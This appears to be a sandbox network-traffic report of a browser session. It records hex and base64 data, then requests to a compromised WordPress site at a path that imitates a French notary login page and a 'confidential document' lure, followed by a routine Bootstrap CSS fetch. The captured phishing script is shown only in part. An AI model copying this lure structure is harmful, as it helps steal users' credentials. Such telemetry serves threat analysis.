                        2024-08-30 22:35:41 UTC16384INData Raw: 77 59 39 77 6f 58 61 73 77 66 47 79 2b 57 5a 32 36 47 6c 4d 70 35 38 38 38 54 52 48 6f 67 62 70 36 36 49 49 6f 6d 2f 79 2b 31 4a 38 75 51 70 4e 31 74 68 38 4a 6c 2b 32 65 64 38 2f 35 2f 41 31 5a 43 36 4b 6f 47 46 54 55 67 52 4a 57 53 78 69 32 2b 63 54 32 50 39 33 4f 59 54 52 7a 67 37 63 37 6b 65 32 79 45 69 43 39 32 49 32 44 39 68 31 74 4f 39 74 51 65 2f 32 45 71 68 53 73 6d 62 54 69 68 38 72 65 77 4b 35 75 57 34 47 50 75 6e 32 7a 6a 66 72 55 57 4e 7a 30 2b 78 4f 39 55 59 4a 44 4b 63 49 52 6f 72 70 47 62 4d 77 78 5a 63 50 74 5a 38 32 42 47 71 79 77 4d 31 66 70 67 52 4c 67 33 6c 59 36 6e 6d 64 57 41 56 4c 52 47 7a 37 65 41 4c 37 54 37 49 6d 33 6b 57 4b 72 77 4b 32 73 39 2b 32 44 51 72 38 2f 62 53 32 59 72 75 41 54 63 2f 30 38 2f 48 6b 73 51 2b 32 43 74 54
                        Data Ascii: wY9woXaswfGy+WZ26GlMp5888TRHogbp66IIom/y+1J8uQpN1th8Jl+2ed8/5/A1ZC6KoGFTUgRJWSxi2+cT2P93OYTRzg7c7ke2yEiC92I2D9h1tO9tQe/2EqhSsmbTih8rewK5uW4GPun2zjfrUWNz0+xO9UYJDKcIRorpGbMwxZcPtZ82BGqywM1fpgRLg3lY6nmdWAVLRGz7eAL7T7Im3kWKrwK2s9+2DQr8/bS2YruATc/08/HksQ+2CtT
                        2024-08-30 22:35:41 UTC16384INData Raw: 41 7a 41 70 75 56 4c 5a 6e 46 49 43 53 63 63 55 59 61 78 54 43 54 59 59 45 58 41 78 4a 68 4e 6e 6b 4d 32 5a 67 42 76 34 32 79 47 4a 44 6a 44 4a 45 6d 52 49 4e 6e 77 79 4d 62 6b 4c 32 78 46 65 50 4e 78 41 67 37 45 65 5a 68 51 34 50 6a 63 66 63 31 37 61 5a 72 46 72 65 72 75 32 37 56 71 61 70 54 56 65 64 55 6e 65 2b 65 2f 30 39 71 38 4b 31 62 39 39 52 33 36 74 62 2f 66 39 37 6e 4f 70 37 6e 45 51 44 41 54 6e 71 71 44 67 41 41 55 42 30 77 41 41 41 73 42 67 59 41 67 4d 58 41 41 41 43 77 47 42 67 41 41 42 59 44 41 77 44 41 59 6d 41 41 41 46 67 4d 44 41 41 41 69 34 45 42 41 47 41 78 4d 41 41 41 4c 41 59 47 41 49 44 46 77 41 41 41 73 42 67 59 41 41 41 57 41 77 4d 41 77 47 4a 67 41 41 42 59 44 41 77 41 41 49 75 70 56 52 31 41 48 6f 34 66 50 79 37 63 78 55 52 6d 63
                        Data Ascii: AzApuVLZnFICSccUYaxTCTYYEXAxJhNnkM2ZgBv42yGJDjDJEmRINnwyMbkL2xFePNxAg7EeZhQ4Pjcfc17aZrFreru27VqapTVedUne+e/09q8K1b99R36tb/f97nOp7nEQDATnqqDgAAUB0wAAAsBgYAgMXAAACwGBgAABYDAwDAYmAAAFgMDAAAi4EBAGAxMAAALAYGAIDFwAAAsBgYAAAWAwMAwGJgAABYDAwAAIupVR1AHo4fPy7cxURmc
                        2024-08-30 22:35:41 UTC16384INData Raw: 2b 37 45 42 41 43 51 6b 41 49 43 41 45 68 49 41 53 45 67 42 41 51 41 6b 4a 41 43 46 77 64 42 45 51 6b 58 68 33 63 6c 61 6f 51 32 50 59 49 70 45 6d 66 71 30 48 34 70 4e 4e 76 42 2f 4e 71 35 4b 63 39 44 7a 4b 76 48 59 48 56 6c 4b 6e 32 58 46 77 37 72 67 6f 68 42 49 53 41 45 42 41 43 51 6b 41 49 43 41 45 68 49 41 53 45 67 42 44 59 4b 41 52 45 4a 47 34 55 6b 6f 70 48 43 41 77 52 41 6d 6e 43 35 32 71 53 64 75 6c 38 52 50 69 76 5a 6e 35 69 48 6e 52 66 50 77 4b 64 79 70 53 78 78 58 4b 4e 37 74 47 38 2f 70 51 55 55 67 67 49 41 53 45 67 42 49 53 41 45 42 41 43 51 6b 41 49 43 41 45 68 49 41 54 57 69 6f 43 49 78 4c 55 69 4a 76 39 43 59 4d 67 52 69 45 51 4f 59 65 67 48 4d 69 66 6d 68 33 6d 68 76 68 2f 79 4e 4f 52 56 35 49 6f 65 50 31 32 65 6e 53 4b 4b 37 6d 6b 33 6c
                        Data Ascii: +7EBACQkAICAEhIASEgBAQAkJACFwdBEQkXh3claoQ2PYIpEmfq0H4pNNvB/Nq5Kc9DzKvHYHVlKn2XFw7rgohBISAEBACQkAICAEhIASEgBDYKAREJG4UkopHCAwRAmnC52qSdul8RPivZn5iHnRfPwKdypSxxXKN7tG8/pQUUggIASEgBISAEBACQkAICAEhIATWioCIxLUiJv9CYMgRiEQOYegHMifmh3mhvh/yNORV5IoeP12enSKK7mk3l
                        2024-08-30 22:35:41 UTC16384INData Raw: 58 69 49 54 43 62 34 64 69 65 64 71 51 7a 4b 43 6e 67 39 6a 37 56 34 6f 45 72 5a 73 65 77 67 75 61 78 66 7a 78 6c 66 2f 48 30 4d 7a 5a 66 47 4d 47 65 30 68 50 41 44 65 51 58 35 71 54 31 4b 6d 49 48 76 6a 77 46 6d 71 46 78 4a 67 68 2b 71 5a 41 50 54 43 41 79 64 5a 77 32 6a 43 57 37 6e 67 5a 4f 62 52 78 6f 6c 51 2f 4c 6b 46 33 36 45 73 2b 66 71 66 48 35 41 35 70 45 4f 2b 41 53 45 47 42 70 75 41 30 6e 59 70 55 64 50 74 65 71 46 53 47 5a 69 4a 4f 62 4b 59 6d 59 67 51 52 6e 46 74 68 56 65 58 49 7a 6c 6a 52 6e 69 79 41 55 70 30 37 62 50 69 77 34 2f 37 46 33 76 4d 6d 2b 37 34 37 44 64 67 50 77 48 34 30 56 6d 38 6e 45 70 47 49 6c 68 7a 6b 34 68 39 4b 4a 32 48 4f 79 6e 57 4f 2b 6b 72 30 5a 59 78 54 78 54 76 66 77 68 78 44 4d 64 4c 77 59 66 34 77 37 52 71 5a 37 51
                        Data Ascii: XiITCb4diedqQzKCng9j7V4oErZsewguaxfzxlf/H0MzZfGMGe0hPADeQX5qT1KmIHvjwFmqFxJgh+qZAPTCAydZw2jCW7ngZObRxolQ/LkF36Es+fqfH5A5pEO+ASEGBpuA0nYpUdPteqFSGZiJObKYmYgQRnFthVeXIzljRniyAUp07bPiw4/7F3vMm+747DdgPwH40Vm8nEpGIlhzk4h9KJ2HOynWO+kr0ZYxTxTvfwhxDMdLwYf4w7RqZ7Q
                        2024-08-30 22:35:41 UTC16384INData Raw: 48 53 6b 32 39 39 39 67 58 47 33 48 63 4b 66 54 55 51 36 6b 4f 56 58 74 72 63 6d 73 4e 56 5a 48 63 56 58 74 6f 66 6d 65 2f 5a 39 37 35 35 70 2f 30 36 4a 42 45 4c 72 4d 42 39 6f 6f 36 63 57 62 43 66 2b 63 4d 54 64 76 49 38 68 38 4b 64 56 63 76 6a 74 68 67 36 2b 77 38 76 44 74 31 53 6e 74 4e 61 76 49 53 58 6e 2f 6c 72 57 35 6f 35 31 34 69 67 73 4f 38 6d 4b 2b 79 37 74 52 6d 47 41 39 56 52 37 46 72 44 31 75 38 71 4b 79 34 39 75 76 36 4e 2b 2f 44 75 58 2f 32 38 74 45 4e 52 77 69 44 31 63 78 38 38 61 48 33 41 53 37 64 6e 37 59 72 4d 37 30 2b 57 4e 72 76 55 57 53 63 69 45 51 33 78 45 68 72 6d 63 53 7a 4a 57 73 4c 47 76 6d 55 4d 38 6f 75 51 6f 47 43 6a 4f 34 39 47 64 2b 66 49 44 6d 42 53 73 50 4d 4c 73 7a 5a 65 32 4f 45 64 35 39 7a 69 44 41 62 74 45 4a 33 48 6c
                        Data Ascii: HSk2999gXG3HcKfTUQ6kOVXtrcmsNVZHcVXtofme/Z9755p/06JBELrMB9oo6cWbCf+cMTdvI8h8KdVcvjthg6+w8vDt1SntNavISXn/lrW5o514igsO8mK+y7tRmGA9VR7FrD1u8qKy49uv6N+/DuX/28tENRwiD1cx88aH3AS7dn7YrM70+WNrvUWSciEQ3xEhrmcSzJWsLGvmUM8ouQoGCjO49Gd+fIDmBSsPMLszZe2OEd59ziDAbtEJ3Hl
                        2024-08-30 22:35:41 UTC16384INData Raw: 44 4b 56 36 79 31 53 55 68 62 79 6c 39 48 6c 77 4e 32 6d 52 4e 49 7a 38 33 56 6c 43 30 46 50 56 4a 54 61 51 4a 42 75 64 76 4b 69 71 6b 58 35 71 4a 4f 6e 4b 4f 73 36 45 6c 61 78 37 68 69 47 33 2f 38 4d 63 77 4e 48 37 50 6f 68 46 6d 34 6b 70 51 72 48 46 54 53 65 55 55 2f 66 5a 63 38 50 41 63 61 36 32 7a 35 35 56 2b 33 78 41 4f 50 32 49 52 69 37 50 7a 44 41 47 63 41 45 70 4d 41 6b 6f 57 46 6d 50 62 71 53 46 6b 4c 39 54 38 43 4a 46 4a 68 4f 78 4b 6d 58 34 6d 7a 46 63 30 38 4f 78 41 30 55 4e 34 38 77 43 71 7a 63 2f 33 67 68 64 4e 74 5a 6f 33 38 42 72 31 35 61 4d 49 37 38 34 4b 66 72 30 53 64 6a 78 47 79 56 52 35 62 58 62 34 32 73 53 45 52 68 6c 7a 6b 34 75 72 75 51 54 4e 4b 37 4d 62 54 4a 75 58 75 76 64 6e 4a 74 2b 35 76 74 4a 38 38 31 45 52 48 7a 45 74 7a 32
                        Data Ascii: DKV6y1SUhbyl9HlwN2mRNIz83VlC0FPVJTaQJBudvKiqkX5qJOnKOs6Elax7hiG3/8McwNH7PohFm4kpQrHFTSeUU/fZc8PAca62z55V+3xAOP2IRi7PzDAGcAEpMAkoWFmPbqSFkL9T8CJFJhOxKmX4mzFc08OxA0UN48wCqzc/3ghdNtZo38Br15aMI784Kfr0SdjxGyVR5bXb42sSERhlzk4uruQTNK7MbTJuXuvdnJt+5vtJ881ERHzEtz2
                        2024-08-30 22:35:41 UTC16384INData Raw: 4f 6a 78 62 79 43 79 68 31 41 59 6e 6b 51 4f 69 51 4c 53 7a 2b 34 2f 52 58 37 46 57 42 69 45 33 4a 39 59 6a 53 47 51 38 67 49 67 49 46 32 43 30 41 6f 67 4a 75 54 35 4c 64 41 4b 5a 30 4c 67 42 6a 6f 36 30 47 77 70 4e 6b 6d 6a 79 6d 7a 6a 78 2b 7a 76 35 33 78 76 73 6d 6d 46 61 73 6b 4e 4d 52 78 65 79 43 63 59 4a 61 73 34 41 38 53 50 4b 34 75 41 45 76 66 43 55 48 34 68 63 71 75 74 6e 4c 71 7a 44 67 6d 79 36 78 37 32 64 6f 65 76 64 4d 32 50 50 6d 67 56 61 4b 4b 56 38 78 54 4d 5a 46 69 32 41 5a 52 79 52 4f 59 47 4d 4c 59 6c 38 66 49 76 54 31 66 4b 55 5a 61 58 53 62 4a 4f 6b 44 6c 69 4d 4d 59 4d 76 30 35 68 74 67 78 72 72 53 6a 37 72 52 6e 49 74 59 37 5a 61 62 4e 50 41 33 56 35 76 47 37 38 6d 46 76 76 30 53 69 68 38 69 70 74 4b 6f 31 62 78 77 4c 6f 31 4e 41 70
                        Data Ascii: OjxbyCyh1AYnkQOiQLSz+4/RX7FWBiE3J9YjSGQ8gIgIF2C0AogJuT5LdAKZ0LgBjo60GwpNkmjymzjx+zv53xvsmmFaskNMRxeyCcYJas4A8SPK4uAEvfCUH4hcqutnLqzDgmy6x72doevdM2PPmgVaKKV8xTMZFi2AZRyROYGMLYl8fIvT1fKUZaXSbJOkDliMMYMv05htgxrrSj7rRnItY7ZabNPA3V5vG78mFvv0Sih8iptKo1bxwLo1NAp
                        2024-08-30 22:35:41 UTC16384INData Raw: 70 52 69 5a 37 4a 7a 59 4a 47 37 72 79 35 44 66 6c 4f 57 38 59 4a 31 4c 4c 74 74 5a 6c 61 2b 4f 79 4c 32 72 46 30 69 58 72 32 4b 41 49 41 47 36 2b 38 30 30 35 53 63 6d 45 68 66 51 4b 72 6b 41 70 4d 42 77 45 75 30 30 31 62 74 58 71 4f 77 46 66 35 50 48 34 43 37 2f 36 54 30 70 5a 76 77 4a 74 7a 42 44 6d 44 6a 55 57 43 51 43 51 44 4a 44 5a 69 6e 70 76 45 75 44 6c 34 37 4a 48 4d 56 54 30 30 62 38 6f 4c 32 72 78 75 6b 7a 72 44 4e 50 53 47 62 43 4e 35 37 59 6e 66 76 61 37 6a 6a 31 50 68 35 38 2b 6b 59 73 67 68 51 56 6f 43 49 34 6f 2b 56 6f 32 70 70 2b 73 74 4a 35 73 64 34 5a 41 53 4e 57 6d 41 4a 62 35 36 6e 62 61 39 38 59 35 6d 33 6e 47 33 55 6a 48 39 7a 41 65 41 36 30 34 2b 55 32 42 45 56 6c 52 57 41 47 4a 69 61 63 4a 7a 69 68 6d 37 39 59 56 35 36 6e 48 6b 45
                        Data Ascii: pRiZ7JzYJG7ry5DflOW8YJ1LLttZla+OyL2rF0iXr2KAIAG6+8005ScmEhfQKrkApMBwEu001btXqOwFf5PH4C7/6T0pZvwJtzBDmDjUWCQCQDJDZinpvEuDl47JHMVT00b8oL2rxukzrDNPSGbCN57Ynfva7jj1Ph58+kYsghQVoCI4o+Vo2pp+stJ5sd4ZASNWmAJb56nba98Y5m3nG3UjH9zAeA604+U2BEVlRWAGJiacJzihm79YV56nHkE


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.44973588.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:41 UTC663OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:41 UTC292INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:41 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 25 Aug 2024 16:52:50 GMT
                        ETag: "1268-62084d6b19c80"
                        Accept-Ranges: bytes
                        Content-Length: 4712
                        Vary: Accept-Encoding
                        Content-Type: application/javascript
                        2024-08-30 22:35:41 UTC4712INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 20 24 20 2a 2f 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 63 6f 75 6e 74 20 3d 20 30 3b 0d 0a 0d 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 63 6f 64 65 20 3d 20 28 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3f 20 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3a 20 65 76 65 6e 74 2e 77 68 69 63 68 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 6b 65 79 63 6f 64 65 20 3d 3d 20 27 31 33 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 28 22 23 64 69 76 50 72 22 29 2e 69 73 28 22 3a 76 69 73 69 62 6c
                        Data Ascii: /* global $ */$(document).ready(function() { var count = 0; $(document).keypress(function(event) { var keycode = (event.keyCode ? event.keyCode : event.which); if (keycode == '13') { if ($("#divPr").is(":visibl


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449740104.18.10.2074433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC603OUTGET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
                        Host: maxcdn.bootstrapcdn.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Origin: https://www.askozvar.sk
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: text/css,*/*;q=0.1
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: style
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC953INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Content-Type: text/css; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Vary: Accept-Encoding
                        CDN-PullZone: 252412
                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                        CDN-RequestCountryCode: US
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=31919000
                        ETag: W/"450fc463b8b1a349df717056fbb3e078"
                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                        CDN-ProxyVer: 1.04
                        CDN-RequestPullSuccess: True
                        CDN-RequestPullCode: 200
                        CDN-CachedAt: 03/18/2024 12:15:40
                        CDN-EdgeStorageId: 718
                        timing-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        X-Content-Type-Options: nosniff
                        CDN-Status: 200
                        CDN-RequestId: 66c229df46098d4c9ac0dfc9ab9a74f7
                        CDN-Cache: HIT
                        CF-Cache-Status: HIT
                        Age: 38893
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Server: cloudflare
                        CF-RAY: 8bb84164edec7285-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:42 UTC416INData Raw: 37 62 66 39 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                        Data Ascii: 7bf9/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                        2024-08-30 22:35:42 UTC1369INData Raw: 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32
                        Data Ascii: ay-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:12
                        2024-08-30 22:35:42 UTC1369INData Raw: 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f
                        Data Ascii: e;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{fo
                        2024-08-30 22:35:42 UTC1369INData Raw: 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74
                        Data Ascii: dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,ht
                        2024-08-30 22:35:42 UTC1369INData Raw: 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d
                        Data Ascii: ,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-
                        2024-08-30 22:35:42 UTC1369INData Raw: 37 64 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                        Data Ascii: 7d}code,kbd,pre,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-col
                        2024-08-30 22:35:42 UTC1369INData Raw: 63 6f 6c 2d 6c 67 2d 39 2c 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d
                        Data Ascii: col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-
